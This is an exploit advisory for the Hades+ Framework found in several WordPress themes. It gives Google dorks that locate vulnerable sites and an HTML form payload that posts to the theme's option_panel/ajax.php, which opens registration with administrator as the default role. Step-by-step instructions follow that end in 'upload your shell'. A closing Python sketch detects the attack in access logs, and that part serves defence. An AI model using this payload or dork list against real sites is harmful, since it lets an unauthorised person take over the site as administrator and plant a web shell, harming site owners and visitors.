Exploit Title: Hades+ Framework Add Administrator
Google Dorks (multiple):
inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
inurl:/wp-content/themes/test/
inurl:/wp-content/themes/Viteeo/
inurl:/wp-content/themes/vithy/
inurl:/wp-content/themes/yvora/
inurl:/wp-content/themes/sodales/
Exploit:
<form action="http://www.yourtarget.com/wp-content/themes/[themename,i mean:/appius//Consultant//archin/etc etc]/hades_framework/option_panel/ajax.php" method="POST">
<input name="values[0][name]" value="users_can_register">
<input name="values[0][value]" value="1">
<input name="values[1][name]" value="admin_email">
<input name="values[1][value]" value="{%YOUR_EMAIL}">
<input name="values[2][name]" value="default_role">
<input name="values[2][value]" value="administrator">
<input name="action" value="save">
<input type="submit" value="Submit">
</form>
Process==>
1. Change [themename,i mean:/appius//Consultant//archin/etc etc] to the vulnerable theme, and [YOUR_EMAIL] to your email address.
sample==>http://www.yourtarget.com/wp-content/themes/[replace the vulnerable themename with yourmailaddress]/hades_framework/option_panel/ajax.php
2. Go to http://www.yourtarget.com/wp-login.php?action=register [you will see the registration form].
3. Choose your username & email address and register.
4. Go to your email; you will find your password.
5. Then log in and upload your shell.
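Detection (added example, not part of the original advisory): the form above posts option values to the theme's option_panel/ajax.php, and the process then relies on a registration request to wp-login.php, so both steps show up in the web server access log. The Python sketch below flags POSTs to that handler under any theme directory and registrations that follow from the same client; the log format (combined), the sample lines, the finding labels and the function name are assumptions made for the example.

```python
import re

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2000:10:01:02 +0000] "POST /wp-content/themes/appius/hades_framework/option_panel/ajax.php HTTP/1.1" 200 12 "-" "-"
203.0.113.7 - - [01/Jan/2000:10:01:40 +0000] "GET /wp-login.php?action=register HTTP/1.1" 200 2301 "-" "-"
203.0.113.7 - - [01/Jan/2000:10:02:05 +0000] "POST /wp-login.php?action=register HTTP/1.1" 302 0 "-" "-"
198.51.100.9 - - [01/Jan/2000:10:03:00 +0000] "GET /wp-content/themes/appius/style.css HTTP/1.1" 200 900 "-" "-"
198.51.100.20 - - [01/Jan/2000:10:04:00 +0000] "POST /wp-login.php?action=register HTTP/1.1" 302 0 "-" "-"
192.0.2.44 - - [01/Jan/2000:10:05:00 +0000] "POST /wp-content/themes/kmp/hades_framework/option_panel/ajax.php HTTP/1.1" 404 0 "-" "-"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Any theme directory that ships the Hades+ option panel handler.
PANEL_RE = re.compile(
    r"^/wp-content/themes/[^/]+/hades_framework/option_panel/ajax\.php(?:\?|$)", re.I)
REGISTER_RE = re.compile(r"^/wp-login\.php\?(?:.*&)?action=register(?:&|$)")


def find_suspects(log_text):
    """Return (client, finding, path) tuples in log order."""
    panel_clients = set()   # clients whose POST reached the option panel
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, method, path, status = m.groups()
        if method != "POST":
            continue
        if PANEL_RE.match(path):
            if int(status) < 400:      # handler exists and answered
                panel_clients.add(client)
                findings.append((client, "option-panel-post", path))
            else:                      # request for a theme that is absent or blocked
                findings.append((client, "option-panel-probe", path))
        elif REGISTER_RE.match(path) and client in panel_clients:
            findings.append((client, "registration-after-panel-post", path))
    return findings


if __name__ == "__main__":
    for finding in find_suspects(SAMPLE_LOG):
        print(*finding)
```

Any "option-panel-post" finding is a reason to review the site's users_can_register, default_role and admin_email options and its list of administrator accounts.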